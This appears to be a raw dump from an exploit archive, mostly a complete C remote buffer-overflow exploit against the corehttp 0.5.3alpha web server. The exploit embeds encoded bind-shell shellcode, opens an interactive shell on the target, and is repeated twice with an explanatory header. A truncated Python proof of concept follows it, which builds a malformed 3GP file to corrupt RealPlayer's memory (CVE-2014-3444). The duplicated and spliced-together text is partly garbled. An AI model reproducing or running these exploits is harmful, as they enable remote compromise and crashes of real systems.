#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]

667
platforms/multiple/dos/39182.py Executable file

@ -0,0 +1,667 @@
source: http://www.securityfocus.com/bid/67434/info
RealPlayer is prone to a memory-corruption vulnerability.
An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
Realplayer 16.0.3.51 is vulnerable; other versions may also be affected.
# Exploit Title: [Realplayer memory corruption in latest Version 16.0.3.51 ]
# Date: [2014/05/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.real.com]
# Software Link: [
http://www.filehippo.com/download_realplayer/download/9b931239de41b8dce664656f25e1c28b/
]
# Version: [Version 16.0.3.51 and prior to that]
# Tested on: [Windows Xp Sp 3 x86, Windows 7 Sp1 x86]
# CVE : [CVE-2014-3444]
details:
Realplayer latest version 16.0.3.51 suffers from an memory corruption
Vulnerability via a malformed .3gp file format when
load RealPlayer\codecs\dmp4.dll .
####Note:it's Exploitable , But Not Stable.####
Poc:
#!/usr/bin/python
data
="\x00\x00\x00\x18\x66\x74\x79\x70\x33\x67\x70\x36\x00\x00\x01\x00\x69\x73\x6F\x6D\x33\x67\x70\x36\x00\x00
\x0F\x2D\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x02\x58
\x00\x00\x19\xFA\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69
\x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x28\x08\xFF\x00\x00\x05\xA4\x74\x72\x61\x6B\x00\x00\x00\x5C\x74
\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x19\xFA\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\xB0\x00\x00\x00\x90\x00\x00\x00\x00\x05
\x40\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x0C\x00
\x00\x00\x85\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x64\x65\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65
\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30\x31\x31\x00\x00\x00\x04\xCC\x6D\x69
\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66
\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00
\x04\x8C\x73\x74\x62\x6C\x00\x00\x00\xB8\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xA8\x6D\x70\x34\x76
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x00\x90\x00\x48
\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xFF\xFF\x00\x00\x00\x52\x65\x73\x64\x73\x00\x00\x00\x00
\x03\x44\x00\x00\x00\x04\x3C\x20\x11\x00\x07\x61\x00\x01\x19\xE8\x00\x00\xCD\xE0\x05\x2D\x00\x00\x01\xB0\x08\x00\x00\x01
\xB5\x89\x13\x00\x00\x01\x00\x00\x00\x01\x20\x00\xC4\x8D\x88\x00\x65\x05\x84\x12\x14\x63\x00\x00\x01\xB2\x4C\x61\x76\x63
\x35\x32\x2E\x34\x31\x2E\x30\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x85
\x00\x00\x00\x01\x00\x00\x00\x1C\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x3D\x00\x00
\x00\x79\x00\x00\x01\x00\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01
\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x09\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0D\x00\x00\x00\x05\x00\x00\x00\x01
\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x14\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x17\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x02\x28\x73\x74\x73\x7A\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x85\x00\x00\x07\x61\x00\x00\x00\xB6\x00\x00\x01\x72\x00\x00\x01\x70\x00\x00\x01\xDC\x00\x00
\x01\xFF\x00\x00\x02\x54\x00\x00\x02\x37\x00\x00\x02\x25\x00\x00\x02\x48\x00\x00\x02\x2C\x00\x00\x02\x3B\x00\x00\x02\x62
\x00\x00\x02\x4E\x00\x00\x02\x81\x00\x00\x02\xD9\x00\x00\x03\x05\x00\x00\x02\x5F\x00\x00\x03\x8B\x00\x00\x02\xDD\x00\x00
\x02\xB8\x00\x00\x02\xD7\x00\x00\x02\x90\x00\x00\x02\xA3\x00\x00\x02\x33\x00\x00\x02\x3E\x00\x00\x02\x2F\x00\x00\x02\x22
\x00\x00\x02\x31\x00\x00\x02\x0C\x00\x00\x02\x76\x00\x00\x01\xF4\x00\x00\x02\x03\x00\x00\x02\x22\x00\x00\x04\x27\x00\x00
\x02\x45\x00\x00\x02\x19\x00\x00\x02\x14\x00\x00\x03\x55\x00\x00\x02\x27\x00\x00\x01\xDF\x00\x00\x03\xDB\x00\x00\x02\x62
\x00\x00\x02\x20\x00\x00\x03\x5D\x00\x00\x01\xE6\x00\x00\x01\xE3\x00\x00\x03\xA0\x00\x00\x02\x3A\x00\x00\x02\x12\x00\x00
\x03\x4C\x00\x00\x01\xD4\x00\x00\x01\xD2\x00\x00\x01\xC5\x00\x00\x04\x0B\x00\x00\x02\x08\x00\x00\x01\xFA\x00\x00\x03\x68
\x00\x00\x01\xC6\x00\x00\x01\x94\x00\x00\x05\x5E\x00\x00\x00\xFD\x00\x00\x02\xF1\x00\x00\x03\xCC\x00\x00\x02\x4A\x00\x00
\x03\x47\x00\x00\x01\x71\x00\x00\x01\x77\x00\x00\x01\xA5\x00\x00\x01\x1D\x00\x00\x02\x31\x00\x00\x02\x6C\x00\x00\x02
\x5F\x00\x00\x02\x2A\x00\x00\x01\xD3\x00\x00\x02\x1D\x00\x00\x01\x71\x00\x00\x02\x04\x00\x00\x02\x7D\x00\x00\x01\x62\x00
\x00\x01\x9E\x00\x00\x01\x7D\x00\x00\x01\xBC\x00\x00\x01\xAD\x00\x00\x01\xDC\x00\x00\x01\x76\x00\x00\x01\xBF\x00\x00\x01
\x48\x00\x00\x01\xD7\x00\x00\x02\x29\x00\x00\x02\x03\x00\x00\x02\x7C\x00\x00\x01\x77\x00\x00\x01\x6F\x00\x00\x01\x2A\x00
\x00\x01\xE0\x00\x00\x01\x7E\x00\x00\x01\x72\x00\x00\x01\x81\x00\x00\x01\x90\x00\x00\x01\xC4\x00\x00\x01\x1B\x00\x00\x01
\x73\x00\x00\x02\x02\x00\x00\x01\x36\x00\x00\x01\x5A\x00\x00\x01\x8C\x00\x00\x02\x1B\x00\x00\x01\xB7\x00\x00\x01\xC2\x00
\x00\x01\xAC\x00\x00\x01\xDA\x00\x00\x01\x8B\x00\x00\x01\x63\x00\x00\x01\xB5\x00\x00\x01\x76\x00\x00\x01\x52\x00\x00\x01
\x84\x00\x00\x01\x6C\x00\x00\x01\xBF\x00\x00\x06\x65\x00\x00\x01\x86\x00\x00\x02\x03\x00\x00\x00\xEF\x00\x00\x01\xE1\x00
\x00\x03\x13\x00\x00\x02\x40\x00\x00\x01\x86\x00\x00\x01\xB0\x00\x00\x01\xD1\x00\x00\x01\x78\x00\x00\x01\xE5\x00\x00\x01
